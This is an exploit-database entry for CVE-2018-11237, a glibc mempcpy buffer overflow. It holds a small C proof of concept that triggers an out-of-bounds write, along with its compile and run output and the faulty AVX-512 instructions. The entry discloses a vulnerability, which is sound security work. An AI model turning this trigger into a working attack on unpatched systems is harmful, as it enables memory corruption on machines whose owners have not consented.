GNU glibc versions prior to 2.27 suffer from a buffer overflow vulnerability.
b343af88553f32eaebef15dc533583e14be83f18b64bb6bc38800f729025d2e4# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow
# Date: 2018-05-24
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: http://www.gnu.org/ <http://www.gnu.org/>
# CVE: CVE-2018-11237
# POC:
$ cat mempcpy.c
#define _GNU_SOURCE 1
#include <string.h>
#include <assert.h>
#define N 97699
char a[N];
char b[N+128];
int
main (void)
{
memset (a, 'x', N);
char *c = mempcpy (b, a, N);
assert (*c == 0);
}
$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy
$ ./mempcpy
mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed.
The problem is these two lines in memmove-avx512-no-vzeroupper.S:
vmovups %zmm4, (%rax)
vmovups %zmm5, 0x40(%rax)
For mempcpy, %rax points to the end of the buffer.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed